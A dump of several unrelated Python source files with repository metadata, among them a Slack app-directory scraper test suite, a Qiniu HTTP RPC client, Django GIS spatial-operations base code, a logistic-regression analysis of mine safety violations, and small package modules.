self.assertEqual(applications[0]['short_description'], 'Controllable must-read lists for your team in Slack ð\x9f\x93\x95ð\x9f\x93\x97ð\x9f\x93\x98')
self.assertEqual(applications[0]['slack_id'], 'A15KDN02Y')
self.assertEqual(applications[0]['slug'], 'A15KDN02Y-must-read')
self.assertEqual(applications[0]['url'], 'https://slack.com/apps/A15KDN02Y-must-read')
class GetCategoriesTest(unittest.TestCase):
@responses.activate
def test_it_returns_a_list_of_categories(self):
with open('test/resources/index.html', 'r') as f:
body = f.read()
responses.add(responses.GET, app_directory.BASE_URL, body=body)
categories = app_directory.get_categories()
self.assertEqual(len(categories), 25)
self.assertEqual(categories[0]['name'], 'Featured')
self.assertEqual(categories[0]['slack_id'], 'At0EFWTR6D')
self.assertEqual(categories[0]['slug'], 'At0EFWTR6D-featured')
self.assertEqual(categories[0]['url'], 'https://slack.com/apps/category/At0EFWTR6D-featured')
class GetCategoryTest(unittest.TestCase):
@responses.activate
def test_it_returns_a_category(self):
url = app_directory.CATEGORY_URL + 'At0EFWTR6D-featured'
with open('test/resources/At0EFWTR6D-featured.html', 'r') as f:
body = f.read()
responses.add(responses.GET, url, body=body)
category = app_directory.get_category('At0EFWTR6D-featured')
self.assertEqual(category['description'], None)
self.assertEqual(category['name'], 'Featured')
self.assertEqual(category['slack_id'], 'At0EFWTR6D')
self.assertEqual(category['slug'], 'At0EFWTR6D-featured')
self.assertEqual(category['url'], 'https://slack.com/apps/category/At0EFWTR6D-featured')
class GetSoupTest(unittest.TestCase):
@responses.activate
def test_it_returns_an_instance_of_beautiful_soup(self):
with open('test/resources/index.html', 'r') as f:
body = f.read()
responses.add(responses.GET, app_directory.BASE_URL, body=body)
soup = app_directory.get_soup(app_directory.BASE_URL)
self.assertIsInstance(soup, BeautifulSoup)
@responses.activate
def test_it_raises_an_exception_when_the_response_is_not_ok(self):
responses.add(responses.GET, app_directory.BASE_URL, status=404)
with self.assertRaises(requests.exceptions.HTTPError):
app_directory.get_soup(app_directory.BASE_URL)
class ParseApplicationListItemTest(unittest.TestCase):
def test_it_returns_an_application(self):
with open('test/resources/At0EFWTR6D-featured.html', 'r') as f:
soup = BeautifulSoup(f, 'html.parser')
soup = soup.find('li', class_='app_row interactive')
application = app_directory.parse_application_list_item(soup)
self.assertEqual(application['avatar'], 'https://slack-files2.s3-us-west-2.amazonaws.com/avatars/2016-05-03/39674680625_65ad135f72eff91b6ddf_96.jpg')
self.assertFalse(application['is_slack_owned'])
self.assertEqual(application['name'], '@must-read')
self.assertEqual(application['position'], 1)
self.assertEqual(application['short_description'], 'Controllable must-read lists for your team in Slack 📕📗📘')
self.assertEqual(application['slack_id'], 'A15KDN02Y')
self.assertEqual(application['slug'], 'A15KDN02Y-must-read')
self.assertEqual(application['url'], 'https://slack.com/apps/A15KDN02Y-must-read')
class ParseApplicationTest(unittest.TestCase):
def test_it_returns_an_application(self):
with open('test/resources/A15KDN02Y-must-read.html', 'r') as f:
soup = BeautifulSoup(f, 'html.parser')
application = app_directory.parse_application(soup)
self.assertEqual(application['avatar'], 'https://slack-files2.s3-us-west-2.amazonaws.com/avatars/2016-05-03/39674680625_65ad135f72eff91b6ddf_512.jpg')
self.assertEqual(len(application['categories']), 4)
self.assertTrue(len(application['description']) > 0)
self.assertEqual(application['help_url'], 'https://finalem.com/must-read/help?utm_source=slack.com&utm_medium=special&utm_campaign=apps')
self.assertEqual(application['name'], '@must-read')
self.assertEqual(application['privacy_policy_url'], 'https://finalem.com/must-read/privacy-policy?utm_source=slack.com&utm_medium=special&utm_campaign=apps')
self.assertEqual(len(application['screenshots']), 6)
self.assertEqual(application['short_description'], 'Controllable must-read lists for your team in Slack 📕📗📘')
class ParseCategoryLinkTest(unittest.TestCase):
def test_it_returns_a_category(self):
with open('test/resources/index.html', 'r') as f:
soup = BeautifulSoup(f, 'html.parser')
soup = soup.find('a', class_='sidebar_menu_list_item')
category = app_directory.parse_category_link(soup)
self.assertEqual(category['name'], 'Featured')
self.assertEqual(category['slack_id'], 'At0EFWTR6D')
self.assertEqual(category['slug'], 'At0EFWTR6D-featured')
self.assertEqual(category['url'], 'https://slack.com/apps/category/At0EFWTR6D-featured')
class ParseCategoryTest(unittest.TestCase):
def test_it_returns_a_category_with_a_description(self):
with open('test/resources/At0MQP5BEF-bots.html', 'r') as f:
soup = BeautifulSoup(f, 'html.parser')
category = app_directory.parse_category(soup)
self.assertEqual(category['description'], 'Bots are like having a virtual team member — they can help you manage tasks, run your team standup, poll the office, and more!')
self.assertEqual(category['name'], 'Bots')
def test_it_returns_a_category_without_a_description(self):
with open('test/resources/At0EFWTR6D-featured.html', 'r') as f:
soup = BeautifulSoup(f, 'html.parser')
category = app_directory.parse_category(soup)
self.assertEqual(category['description'], None)
self.assertEqual(category['name'], 'Featured')
if __name__ == '__main__':
unittest.main()
| 46.378378 | 179 | 0.706643 |
4a2243dd7367394515055b2fb484f4593299d54e | 67 | py | Python | speechbrain/processing/__init__.py | JasonSWFu/speechbrain | cb78ba2b33fceba273b055dc471535344c3053f0 | [
"Apache-2.0"
] | 3,913 | 2021-03-14T13:54:52.000Z | 2022-03-30T05:09:55.000Z | speechbrain/processing/__init__.py | JasonSWFu/speechbrain | cb78ba2b33fceba273b055dc471535344c3053f0 | [
"Apache-2.0"
] | 667 | 2021-03-14T20:11:17.000Z | 2022-03-31T04:07:17.000Z | speechbrain/processing/__init__.py | JasonSWFu/speechbrain | cb78ba2b33fceba273b055dc471535344c3053f0 | [
"Apache-2.0"
] | 785 | 2021-03-14T13:20:57.000Z | 2022-03-31T03:26:03.000Z | """ Package containing various techniques of speech processing
"""
| 22.333333 | 62 | 0.776119 |
4a22444916aedda53cbb504613b51e95db265a25 | 4,987 | py | Python | qiniu/rpc.py | Yong-Lee/liyong | 9a7898099eedf37db41c459b4b52f334fbaa091a | [
"MIT"
] | 68 | 2015-01-13T03:40:11.000Z | 2020-06-16T11:37:03.000Z | qiniu/rpc.py | lepture/python-sdk | b9e2a048a40e0aed1e3bad3bf2ae7b46ff1523b1 | [
"MIT"
] | 1 | 2018-04-03T04:40:01.000Z | 2018-04-03T04:40:01.000Z | qiniu/rpc.py | lepture/python-sdk | b9e2a048a40e0aed1e3bad3bf2ae7b46ff1523b1 | [
"MIT"
] | 36 | 2015-01-12T13:47:24.000Z | 2018-12-02T15:07:50.000Z | # -*- coding: utf-8 -*-
import httplib_chunk as httplib
import json
import cStringIO
import conf
class Client(object):
_conn = None
_header = None
def __init__(self, host):
self._conn = httplib.HTTPConnection(host)
self._header = {}
def round_tripper(self, method, path, body):
self._conn.request(method, path, body, self._header)
resp = self._conn.getresponse()
return resp
def call(self, path):
return self.call_with(path, None)
def call_with(self, path, body, content_type=None, content_length=None):
ret = None
self.set_header("User-Agent", conf.USER_AGENT)
if content_type is not None:
self.set_header("Content-Type", content_type)
if content_length is not None:
self.set_header("Content-Length", content_length)
resp = self.round_tripper("POST", path, body)
try:
ret = resp.read()
ret = json.loads(ret)
except IOError, e:
return None, e
except ValueError:
pass
if resp.status / 100 != 2:
err_msg = ret if "error" not in ret else ret["error"]
detail = resp.getheader("x-log", None)
if detail is not None:
err_msg += ", detail:%s" % detail
return None, err_msg
return ret, None
def call_with_multipart(self, path, fields=None, files=None):
"""
* fields => {key}
* files => [{filename, data, content_type}]
"""
content_type, mr = self.encode_multipart_formdata(fields, files)
return self.call_with(path, mr, content_type, mr.length())
def call_with_form(self, path, ops):
"""
* ops => {"key": value/list()}
"""
body = []
for i in ops:
if isinstance(ops[i], (list, tuple)):
data = ('&%s=' % i).join(ops[i])
else:
data = ops[i]
body.append('%s=%s' % (i, data))
body = '&'.join(body)
content_type = "application/x-www-form-urlencoded"
return self.call_with(path, body, content_type, len(body))
def set_header(self, field, value):
self._header[field] = value
def set_headers(self, headers):
self._header.update(headers)
def encode_multipart_formdata(self, fields, files):
"""
* fields => {key}
* files => [{filename, data, content_type}]
* return content_type, content_length, body
"""
if files is None:
files = []
if fields is None:
fields = {}
readers = []
BOUNDARY = '----------ThIs_Is_tHe_bouNdaRY_$'
CRLF = '\r\n'
L1 = []
for key in fields:
L1.append('--' + BOUNDARY)
L1.append('Content-Disposition: form-data; name="%s"' % key)
L1.append('')
L1.append(fields[key])
b1 = CRLF.join(L1)
readers.append(b1)
for file_info in files:
L = []
L.append('')
L.append('--' + BOUNDARY)
disposition = "Content-Disposition: form-data;"
filename = _qiniu_escape(file_info.get('filename'))
L.append('%s name="file"; filename="%s"' % (disposition, filename))
L.append('Content-Type: %s' % file_info.get('content_type', 'application/octet-stream'))
L.append('')
L.append('')
b2 = CRLF.join(L)
readers.append(b2)
data = file_info.get('data')
readers.append(data)
L3 = ['', '--' + BOUNDARY + '--', '']
b3 = CRLF.join(L3)
readers.append(b3)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, MultiReader(readers)
def _qiniu_escape(s):
edits = [('\\', '\\\\'), ('\"', '\\\"')]
for (search, replace) in edits:
s = s.replace(search, replace)
return s
class MultiReader(object):
""" class MultiReader([readers...])
MultiReader returns a read()able object that's the logical concatenation of
the provided input readers. They're read sequentially.
"""
def __init__(self, readers):
self.readers = []
self.content_length = 0
self.valid_content_length = True
for r in readers:
if hasattr(r, 'read'):
if self.valid_content_length:
length = self._get_content_length(r)
if length is not None:
self.content_length += length
else:
self.valid_content_length = False
else:
buf = r
if not isinstance(buf, basestring):
buf = str(buf)
buf = encode_unicode(buf)
r = cStringIO.StringIO(buf)
self.content_length += len(buf)
self.readers.append(r)
    # don't name it __len__, because the length of MultiReader is not always valid.
def length(self):
return self.content_length if self.valid_content_length else None
def _get_content_length(self, reader):
data_len = None
if hasattr(reader, 'seek') and hasattr(reader, 'tell'):
try:
reader.seek(0, 2)
data_len= reader.tell()
reader.seek(0, 0)
except OSError:
# Don't send a length if this failed
data_len = None
return data_len
def read(self, n=-1):
if n is None or n == -1:
return ''.join([encode_unicode(r.read()) for r in self.readers])
else:
L = []
while len(self.readers) > 0 and n > 0:
b = self.readers[0].read(n)
if len(b) == 0:
self.readers = self.readers[1:]
else:
L.append(encode_unicode(b))
n -= len(b)
return ''.join(L)
def encode_unicode(u):
if isinstance(u, unicode):
u = u.encode('utf8')
return u
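# Illustrative usage (a hedged sketch; the host, path, token and field values
# below are placeholders rather than a documented endpoint):
#
#   client = Client('upload.example.com')
#   fields = {'token': '<upload-token>', 'key': 'example.txt'}
#   files = [{'filename': 'example.txt', 'data': 'hello, world',
#             'content_type': 'text/plain'}]
#   ret, err = client.call_with_multipart('/', fields, files)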
| 24.566502 | 91 | 0.647283 |
4a2245680f7b11f08f3aeeeeda73818b3b97e90e | 6,371 | py | Python | checkerista/.env/Lib/site-packages/django/contrib/gis/db/backends/base/operations.py | LybaFatimaNasir/CS311S20PID02 | bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39 | [
"MIT"
] | 15 | 2020-06-04T05:22:47.000Z | 2021-07-06T01:37:57.000Z | checkerista/.env/Lib/site-packages/django/contrib/gis/db/backends/base/operations.py | LybaFatimaNasir/CS311S20PID02 | bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39 | [
"MIT"
] | 51 | 2019-10-08T01:53:02.000Z | 2021-06-04T22:02:21.000Z | checkerista/.env/Lib/site-packages/django/contrib/gis/db/backends/base/operations.py | LybaFatimaNasir/CS311S20PID02 | bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39 | [
"MIT"
] | 11 | 2019-09-14T20:57:30.000Z | 2022-01-19T17:59:26.000Z | from django.contrib.gis.db.models import GeometryField
from django.contrib.gis.db.models.functions import Distance
from django.contrib.gis.measure import (
Area as AreaMeasure, Distance as DistanceMeasure,
)
from django.db.utils import NotSupportedError
from django.utils.functional import cached_property
class BaseSpatialOperations:
# Quick booleans for the type of this spatial backend, and
# an attribute for the spatial database version tuple (if applicable)
postgis = False
spatialite = False
mysql = False
oracle = False
spatial_version = None
# How the geometry column should be selected.
select = '%s'
@cached_property
def select_extent(self):
return self.select
# Does the spatial database have a geometry or geography type?
geography = False
geometry = False
# Aggregates
disallowed_aggregates = ()
geom_func_prefix = ''
# Mapping between Django function names and backend names, when names do not
# match; used in spatial_function_name().
function_names = {}
# Blacklist/set of known unsupported functions of the backend
unsupported_functions = {
'Area', 'AsGeoJSON', 'AsGML', 'AsKML', 'AsSVG', 'Azimuth',
'BoundingCircle', 'Centroid', 'Difference', 'Distance', 'Envelope',
'GeoHash', 'GeometryDistance', 'Intersection', 'IsValid', 'Length',
'LineLocatePoint', 'MakeValid', 'MemSize', 'NumGeometries',
'NumPoints', 'Perimeter', 'PointOnSurface', 'Reverse', 'Scale',
'SnapToGrid', 'SymDifference', 'Transform', 'Translate', 'Union',
}
# Constructors
from_text = False
# Default conversion functions for aggregates; will be overridden if implemented
# for the spatial backend.
def convert_extent(self, box, srid):
raise NotImplementedError('Aggregate extent not implemented for this spatial backend.')
def convert_extent3d(self, box, srid):
raise NotImplementedError('Aggregate 3D extent not implemented for this spatial backend.')
# For quoting column values, rather than columns.
def geo_quote_name(self, name):
return "'%s'" % name
# GeometryField operations
def geo_db_type(self, f):
"""
Return the database column type for the geometry field on
the spatial backend.
"""
raise NotImplementedError('subclasses of BaseSpatialOperations must provide a geo_db_type() method')
def get_distance(self, f, value, lookup_type):
"""
Return the distance parameters for the given geometry field,
lookup value, and lookup type.
"""
raise NotImplementedError('Distance operations not available on this spatial backend.')
def get_geom_placeholder(self, f, value, compiler):
"""
Return the placeholder for the given geometry field with the given
value. Depending on the spatial backend, the placeholder may contain a
stored procedure call to the transformation function of the spatial
backend.
"""
def transform_value(value, field):
return value is not None and value.srid != field.srid
if hasattr(value, 'as_sql'):
return (
'%s(%%s, %s)' % (self.spatial_function_name('Transform'), f.srid)
if transform_value(value.output_field, f)
else '%s'
)
if transform_value(value, f):
# Add Transform() to the SQL placeholder.
return '%s(%s(%%s,%s), %s)' % (
self.spatial_function_name('Transform'),
self.from_text, value.srid, f.srid,
)
elif self.connection.features.has_spatialrefsys_table:
return '%s(%%s,%s)' % (self.from_text, f.srid)
else:
# For backwards compatibility on MySQL (#27464).
return '%s(%%s)' % self.from_text
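    # For example (a hedged illustration assuming the PostGIS backend, where
    # `from_text` is 'ST_GeomFromText' and the function prefix is 'ST_'):
    # binding a geometry with srid=4326 to a field with srid=3857 yields the
    # placeholder 'ST_Transform(ST_GeomFromText(%s,4326), 3857)', while a
    # matching srid yields 'ST_GeomFromText(%s,3857)'.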
def check_expression_support(self, expression):
if isinstance(expression, self.disallowed_aggregates):
raise NotSupportedError(
"%s spatial aggregation is not supported by this database backend." % expression.name
)
super().check_expression_support(expression)
def spatial_aggregate_name(self, agg_name):
raise NotImplementedError('Aggregate support not implemented for this spatial backend.')
def spatial_function_name(self, func_name):
if func_name in self.unsupported_functions:
raise NotSupportedError("This backend doesn't support the %s function." % func_name)
return self.function_names.get(func_name, self.geom_func_prefix + func_name)
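    # Example with hypothetical values: given geom_func_prefix = 'ST_' and
    # function_names = {'Length': 'ST_Length2D'}, spatial_function_name('Area')
    # returns 'ST_Area' while spatial_function_name('Length') returns
    # 'ST_Length2D'; names in unsupported_functions raise NotSupportedError.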
# Routines for getting the OGC-compliant models.
def geometry_columns(self):
raise NotImplementedError('Subclasses of BaseSpatialOperations must provide a geometry_columns() method.')
def spatial_ref_sys(self):
        raise NotImplementedError('subclasses of BaseSpatialOperations must provide a spatial_ref_sys() method')
distance_expr_for_lookup = staticmethod(Distance)
def get_db_converters(self, expression):
converters = super().get_db_converters(expression)
if isinstance(expression.output_field, GeometryField):
converters.append(self.get_geometry_converter(expression))
return converters
def get_geometry_converter(self, expression):
raise NotImplementedError(
'Subclasses of BaseSpatialOperations must provide a '
'get_geometry_converter() method.'
)
def get_area_att_for_field(self, field):
if field.geodetic(self.connection):
if self.connection.features.supports_area_geodetic:
return 'sq_m'
raise NotImplementedError('Area on geodetic coordinate systems not supported.')
else:
units_name = field.units_name(self.connection)
if units_name:
return AreaMeasure.unit_attname(units_name)
def get_distance_att_for_field(self, field):
dist_att = None
if field.geodetic(self.connection):
if self.connection.features.supports_distance_geodetic:
dist_att = 'm'
else:
units = field.units_name(self.connection)
if units:
dist_att = DistanceMeasure.unit_attname(units)
return dist_att
| 39.08589 | 114 | 0.66583 |
4a2246d4483e8c4c03b5622cb94c683b4e0abaad | 171 | py | Python | toughio/_io/input/toughreact_solute/__init__.py | keurfonluu/ToughMeshio | 9f374f5c72df4d76bf63ae4f87f2f2d4e52c81e0 | [
"BSD-3-Clause-LBNL"
] | null | null | null | toughio/_io/input/toughreact_solute/__init__.py | keurfonluu/ToughMeshio | 9f374f5c72df4d76bf63ae4f87f2f2d4e52c81e0 | [
"BSD-3-Clause-LBNL"
] | null | null | null | toughio/_io/input/toughreact_solute/__init__.py | keurfonluu/ToughMeshio | 9f374f5c72df4d76bf63ae4f87f2f2d4e52c81e0 | [
"BSD-3-Clause-LBNL"
] | null | null | null | from .._helpers import register
from ._read import read
from ._write import write
__all__ = [
"read",
"write",
]
register("toughreact-solute", [], read, write)
| 14.25 | 46 | 0.672515 |
4a2246e2485b6e28efc996f076e5ec21f0bf48b9 | 11,776 | py | Python | Analysis/src/logistic_reg.py | Columbia-CRIS/violation-data-analysis | 2d7b7128a61527ce392905f961b6f1d31ce2ba49 | [
"Apache-2.0"
] | 1 | 2018-02-22T22:31:20.000Z | 2018-02-22T22:31:20.000Z | Analysis/src/logistic_reg.py | Columbia-CRIS/violation-data-analysis | 2d7b7128a61527ce392905f961b6f1d31ce2ba49 | [
"Apache-2.0"
] | null | null | null | Analysis/src/logistic_reg.py | Columbia-CRIS/violation-data-analysis | 2d7b7128a61527ce392905f961b6f1d31ce2ba49 | [
"Apache-2.0"
] | null | null | null | #!usr/bin/env ipython
"""Load MSHA data and run a logistic regression.
@author: Albert
@version: 0.0.2
@date: 10/17/16
Note:
data file path is relative, use your own data file path
"""
import pandas as pd
import numpy as np
from sklearn import cross_validation
from sklearn.linear_model import LogisticRegression
from sklearn.learning_curve import learning_curve
import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap
def plot_decision_regions(X, y, classifier, resolution=0.02):
"""Plot decision regions for binary features.
"""
# setup marker generator and color map
markers = ('s', 'x', 'o', '^', 'v')
colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')
cmap = ListedColormap(colors[:len(np.unique(y))])
# plot the decision surface
x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1
x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),
np.arange(x2_min, x2_max, resolution))
Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)
Z = Z.reshape(xx1.shape)
plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)
plt.xlim(xx1.min(), xx1.max())
plt.ylim(xx2.min(), xx2.max())
# plot class samples
for idx, cl in enumerate(np.unique(y)):
plt.scatter(x=X[y == cl, 0], y=X[y == cl, 1],
alpha=0.8, c=cmap(idx),
marker=markers[idx], label=cl)
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
"""Generate a simple plot of the test and traning learning curve.
Parameters:
estimator : object type that implements the "fit" and "predict" methods
An object of that type which is cloned for each validation.
title : string
Title for the chart.
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape (n_samples) or (n_samples, n_features), optional
Target relative to X for classification or regression;
None for unsupervised learning.
ylim : tuple, shape (ymin, ymax), optional
Defines minimum and maximum yvalues plotted.
cv : integer, cross-validation generator, optional
If an integer is passed, it is the number of folds (defaults to 3).
Specific cross-validation objects can be passed, see
sklearn.cross_validation module for the list of possible objects
n_jobs : integer, optional
Number of jobs to run in parallel (default 1).
"""
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid()
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Cross-validation score")
plt.legend(loc="best")
return plt
def test_1(data_file_path, resolution=0.5, *args):
"""Plot two-feature decision boundary.
``log(penalty)`` vs. ``num_violation``
Data:
`top_5_accident_mines_geq_30.csv`
"""
data = pd.read_csv(data_file_path)
data.fillna(0, inplace=True)
feature1 = args[0]
feature2 = args[1]
label = args[2]
data[feature2] = np.log(data[feature2] + 1)
x_train = data[[feature1, feature2]].values
y_train = data[label].values
lr = LogisticRegression(C=500)
lr.fit(x_train, y_train)
plot_decision_regions(x_train, y_train, classifier=lr,
resolution=resolution)
plt.xlabel(feature1)
plt.ylabel('log of ' + feature2)
plt.legend(loc='upper left')
# plt.tight_layout()
# plt.savefig('../lr.png', dpi=300)
plt.show()
def test_2(data_file_path, resolution=0.5, *args):
"""Plot two-feature decision boundary.
``num_violation_t`` vs. ``num_violation_t_minus_1``
Data:
`Recent_5_Mine_Accidents_Data_training_2.csv`
"""
data = pd.read_csv(data_file_path)
data.fillna(0)
feature1 = args[0]
feature2 = args[1]
label = args[2]
x_train = data[[feature1, feature2]].values
y_train = data[label].values
lr = LogisticRegression(C=500)
lr.fit(x_train, y_train)
plot_decision_regions(x_train, y_train, classifier=lr,
resolution=resolution)
plt.xlabel(feature1)
plt.ylabel(feature2)
plt.legend(loc='upper left')
# plt.tight_layout()
# plt.savefig('../lr.png', dpi=300)
plt.show()
def test_3(data_file_path, *args):
"""Check whether label is reasonable.
Plot ``num_violation`` vs. ``accident_label_t_plus_1``
Data:
`top_5_accident_mines_geq_80.csv`
"""
data = pd.read_csv(data_file_path)
feature1 = args[0]
label = args[1]
acc_label = data[label]
x_val = data[feature1]
plt.scatter(x_val, acc_label)
plt.xlabel(feature1)
plt.ylabel(label)
plt.ylim(-0.5, 1.5)
# plt.legend(loc='upper left')
plt.show()
def test_4(data_file_path, randseed, *args):
"""Plot learning curve.
"""
data = pd.read_csv(data_file_path)
feature1 = args[0]
label = args[1]
x_train = data[[feature1]].values
y_train = data[label].values
title = 'Learning Curve'
cv = cross_validation.ShuffleSplit(x_train.shape[0],
random_state=randseed)
estimator = LogisticRegression(C=500)
plot_learning_curve(estimator, title, x_train, y_train, cv=cv)
plt.show()
def test_5(data_file_path, resolution, *args):
"""`last_yr_penal` vs `last_yr_viols`
"""
data = pd.read_csv(data_file_path)
data.fillna(0)
feature1 = args[0]
feature2 = args[1]
label = args[2]
x_train = data[[feature1, feature2]].values
y_train = data[label].values
lr = LogisticRegression(C=500)
lr.fit(x_train, y_train)
plot_decision_regions(x_train, y_train, classifier=lr,
resolution=resolution)
plt.xlabel(feature1)
plt.ylabel(feature2)
plt.legend(loc='upper left')
# plt.tight_layout()
# plt.savefig('../lr.png', dpi=300)
plt.show()
def test_6(data_file_path, resolution, *args):
"""`avg_last_3yr_viols` vs `last_yr_viols`
"""
data = pd.read_csv(data_file_path)
data.fillna(0)
feature1 = args[0]
feature2 = args[1]
label = args[2]
x_train = data[[feature1, feature2]].values
y_train = data[label].values
lr = LogisticRegression(C=500)
lr.fit(x_train, y_train)
plot_decision_regions(x_train, y_train, classifier=lr,
resolution=resolution)
plt.xlabel(feature1)
plt.ylabel(feature2)
plt.legend(loc='upper left')
# plt.tight_layout()
# plt.savefig('../lr.png', dpi=300)
plt.show()
def test_7(data_file_path, resolution, *args):
"""`avg_last_3yr_penals` vs `last_yr_penals`
"""
data = pd.read_csv(data_file_path)
data.fillna(0)
feature1 = args[0]
feature2 = args[1]
label = args[2]
x_train = data[[feature1, feature2]].values
y_train = data[label].values
lr = LogisticRegression(C=500)
lr.fit(x_train, y_train)
plot_decision_regions(x_train, y_train, classifier=lr,
resolution=resolution)
plt.xlabel(feature1)
plt.ylabel(feature2)
plt.legend(loc='upper left')
# plt.tight_layout()
# plt.savefig('../lr.png', dpi=300)
plt.show()
def test_8(data_file_path, resolution, *args):
"""`log(avg_last_3yr_penals)` vs `log(last_yr_penals)`
"""
data = pd.read_csv(data_file_path)
data.fillna(0)
feature1 = args[0]
feature2 = args[1]
label = args[2]
data[feature1] = np.log(data[feature1] + 1)
data[feature2] = np.log(data[feature2] + 1)
x_train = data[[feature1, feature2]].values
y_train = data[label].values
lr = LogisticRegression(C=500)
lr.fit(x_train, y_train)
plot_decision_regions(x_train, y_train, classifier=lr,
resolution=resolution)
plt.xlabel(feature1)
plt.ylabel(feature2)
plt.legend(loc='upper left')
# plt.tight_layout()
# plt.savefig('../lr.png', dpi=300)
plt.show()
if __name__ == "__main__":
dataset = ['../data/Recent_5_Mine_Accidents_Data_training_2.csv',
'../data/top_5_accident_mines_processed_geq_30.csv',
'../data/top_5_accident_mines_processed_geq_80.csv',
'../data/mine-id/4608791.csv',
'../data/mine-id/4608436.csv',
'../data/mine-id/4601437.csv',
'../data/mine-id/4201715.csv',
'../data/mine-id/1202215.csv',
'../data/mine-id/4608791_label-geq2.csv',
'../data/mine-id/master.csv',
'../data/mine-id/4608791_rolling_quarterly.csv',
'../data/mine-id/4608791_quarterly.csv',
'../data/mine-id/4608791_yearly.csv',
'../Data/mine-id/master_yearly.csv']
feature_list = ['num_violations',
'num_violations_t_minus_1',
'total_penalties',
u'date',
u'last_yr_viols',
u'last_yr_penals',
u'avg_last_3yr_viols',
u'avg_last_3yr_penals',
'accident_label_t_plus_1',
u'accident_label']
"""
# Group 1 - pre-accident feature tests
test_1(dataset[1], 0.5, feature_list[0],
feature_list[2], feature_list[8])
test_2(dataset[0], 0.5, feature_list[0],
feature_list[1], feature_list[8])
test_3(dataset[2], feature_list[2], feature_list[8])
test_4(dataset[1], 100, feature_list[0], feature_list[8])
"""
"""
# Group 2 - mine-id logistic regression
test_5(dataset[3], 50, feature_list[4],
feature_list[5], feature_list[9])
test_6(dataset[7], 10, feature_list[4],
feature_list[6], feature_list[9])
test_6(dataset[9], 10, feature_list[4],
feature_list[6], feature_list[9]) # all 6 mine data in one csv
test_7(dataset[3], 50, feature_list[5],
feature_list[7], feature_list[9])
"""
"""
# Group 3 - different time span
test_6(dataset[10], 50, feature_list[4],
feature_list[6], feature_list[9]) # quarterly rolling
test_7(dataset[11], 100, feature_list[5],
feature_list[7], feature_list[9]) # quarterly
test_7(dataset[12], 100, feature_list[5],
feature_list[7], feature_list[9]) # yearly
test_6(dataset[13], 50, feature_list[4],
feature_list[6], feature_list[9]) # yearly all 6 mind data
"""
test_8(dataset[13], 0.5, feature_list[5],
feature_list[7], feature_list[9]) # yearly all 6 mind data
| 29.58794 | 79 | 0.617018 |
4a224a702c24d5ae3665a2283c7b1faeabf33c33 | 666 | py | Python | 496-next-greater-element-i/496-next-greater-element-i.py | yuzhengcuhk/MyLeetcodeRecord | bd516c6f2946b922da53e587fc186935c6a8819c | [
"MIT"
] | 3 | 2022-02-07T12:47:43.000Z | 2022-03-13T16:40:12.000Z | 496-next-greater-element-i/496-next-greater-element-i.py | yuzhengcuhk/MyLeetcodeRecord | bd516c6f2946b922da53e587fc186935c6a8819c | [
"MIT"
] | null | null | null | 496-next-greater-element-i/496-next-greater-element-i.py | yuzhengcuhk/MyLeetcodeRecord | bd516c6f2946b922da53e587fc186935c6a8819c | [
"MIT"
] | null | null | null | class Solution:
def nextGreaterElement(self, nums1: List[int], nums2: List[int]) -> List[int]:
result = []
for item in nums1:
if item in nums2:
indexItem = nums2.index(item)
indexNext = indexItem + 1
while indexNext < len(nums2):
if nums2[indexNext] > nums2[indexItem]:
result.append(nums2[indexNext])
break
else:
indexNext += 1
if indexNext == len(nums2):
result.append(-1)
return result
| 37 | 82 | 0.427928 |
4a224b6d84907c774a7d7e2536758387a23e7795 | 1,417 | py | Python | binx/exceptions.py | bsnacks000/bds | e5b358d7183fc604234fc8e571bbceeda37c09e8 | [
"MIT"
] | null | null | null | binx/exceptions.py | bsnacks000/bds | e5b358d7183fc604234fc8e571bbceeda37c09e8 | [
"MIT"
] | 17 | 2018-07-03T19:04:55.000Z | 2019-08-24T15:12:52.000Z | binx/exceptions.py | bsnacks000/bds | e5b358d7183fc604234fc8e571bbceeda37c09e8 | [
"MIT"
] | 1 | 2019-10-10T19:39:28.000Z | 2019-10-10T19:39:28.000Z | """ Custom exceptions for binx
"""
from marshmallow.exceptions import ValidationError
class BinxError(Exception):
""" A base exception for the library
"""
class InternalNotDefinedError(BinxError):
""" used for development - thrown if an Internal class is improperly declared on a Collection"""
class CollectionLoadError(BinxError):
""" thrown if a Collection fails to load its Internal Object Collection this could be due to a validation error or some other issue """
class FactoryProcessorFailureError(BinxError):
""" raised if the _process method of a Factory fails to produce any results
"""
class FactoryCreateValidationError(BinxError):
""" wraps a marshmallow validation error in the create method of the factory
"""
class RegistryError(BinxError, KeyError):
""" raised if a classname already exists in the collection registry
"""
class CollectionValidationError(ValidationError, BinxError):
""" subclass of a marshmallow validation error
"""
class AdapterCollectionResultError(BinxError):
""" thrown if a collection load fails while attempting to adapt
"""
class AdapterChainError(BinxError):
""" thrown if a input collection cannot be found on the adapter chain for a Collection
"""
class AdapterFunctionError(BinxError, ValueError):
""" thrown if a 2-tuple is not returned from a pluggable adapter function.
"""
